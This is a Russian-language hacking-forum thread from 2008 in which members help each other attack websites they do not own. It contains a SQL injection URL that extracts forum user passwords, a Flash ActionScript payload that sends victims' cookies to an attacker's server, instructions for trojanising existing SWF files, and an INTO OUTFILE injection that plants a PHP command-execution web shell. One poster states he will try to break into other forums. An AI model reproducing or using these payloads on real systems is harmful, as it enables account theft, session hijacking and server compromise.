Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [:|||||:]

    [:|||||:] Banned

    Joined:
    29 May 2008
    Messages:
    68
    Likes Received:
    59
    Reputations:
    11
    А саму скулю подставлял:
    Code:
    misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0  ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
    Если не работает- стало быть либо пофиксено, либо скуля в сплойте кривая.
     
  2. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Подставлял!
    Похоже и правда профиксено!
    Ничего нету не ошибки, не информации!
    Ребятки подскажите, что еще можно туда вставить!
     
  3. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    И еще вопрос (извините, если замучил)…
    Насколько я понимаю данный баг надо впихивать через флешку (swf)??

    Code:
    getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java  script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
     
  4. [:|||||:]

    [:|||||:] Banned

    Joined:
    29 May 2008
    Messages:
    68
    Likes Received:
    59
    Reputations:
    11
    да, это ActionScript- язык сценариев, иcпользуемый в Flash
     
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    SeeJay
    Тебе понадобится Flash-редактор "Marcomedia Flash" версии 8 или более, а так же браузер с установленным flash-плагином. С помощью Flash-ролика заставим браузер выполнить простейший JS-код:
    Открой Macromedia Flash и создай новый ролик. В первом кадре нарисуй что угодно. Затем на линии кадров кликни правой кнопкой мыши на первом кадре и, в появившемся меню, выбери пункт "Actions". Внизу появится текстовое поле для AS-кода. В этом поле ты должен вписать код который вызовет выполнение JS-сценария.
    Сделать это можно с помощью функции getURL() которой в виде единственного параметра нужно передать следующую
    строку: "javascript:код". У тебя должна получится всего одна строка следующего содержания:
    в твоем случае это:
    Сохрани полученный Flash-ролик в какой-либо папке, опубликуй (меню File->Publish) и в ней же создай html-файл следующего содержания:
    поидее должно работать) главное не падай в минуса..
     
    #2165 sabe, 30 May 2008
    Last edited: 30 May 2008
  6. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Спасибо буду пробовать!
     
    1 person likes this.
  7. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Написал простенький скрипт на php, подобрал колечество столбцов, вывел USER() и остальную инфу, НО читать файлы не получается. Пользуюсь денвером. Подскажите как файлы читать. Что LOAD_FILE() это я знаю, а путь ни как подобрать не могу.
     
  8. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Что за бред, ты юзаешь скрипт на локалхосте и не можешь подобрать путь?
     
  9. Kulspruta

    Kulspruta Elder - Старейшина

    Joined:
    20 May 2008
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Народ,почему все статьи о взломах есть,кроме php inj??
    ПРосьба написать
     
  10. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
  11. SeeJay

    SeeJay New Member

    Joined:
    21 Feb 2006
    Messages:
    18
    Likes Received:
    1
    Reputations:
    -1
    Дааааааа…
    Форум то мой пропатчен от и до!
    Буду пробовать через другие залезать!
    Буду, благодарен совету!

    С уважением и благодарностью SeeJay!
     
  12. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    как обновить в селект запросе данные в БД?

    как это использовать?
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    думаю так:
    но помоему невсегда будет работать..
     
    #2173 sabe, 30 May 2008
    Last edited: 30 May 2008
    1 person likes this.
  14. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Ничего вы этим не сделаете. Я написал выше.
     
    1 person likes this.
  15. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    PHP:
    class hek{
      function 
    hek() {
      }

      static function 
    main(mc) {
        
    getURL("javascript:alert(document.cookie);");
      }
    }
    Далее компилим
    Code:
    mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
    заливаем куда надо и всё собственно

    Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
    Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
    Code:
    swfdump.exe hek.swf
    компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
    Code:
    mtasc.exe -swf hek.swf -main -header x:y:z hek.as
    x и y - размеры, z - частота кадров в секунду
    и вживляем
    Code:
    swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
     
    _________________________
    3 people like this.
  16. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    а уязвимости движков на файлах и на базах сильна отличаются?
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    >> а уязвимости движков на файлах и на базах сильна отличаются?

    xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.
     
  18. Demetra

    Demetra Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    48
    Likes Received:
    8
    Reputations:
    0
    ясна,это хорошо
     
  19. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Подскажите , есть слепок БД одного форума .
    Смогу ли я методом INSERT INTO FILE залить туда шелл ?
    Если можно с примером , в mysql не силён
    Спасибо .
     
  20. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.
     
    #2180 А®ТеS, 31 May 2008
    Last edited: 31 May 2008
Thread Status:
Not open for further replies.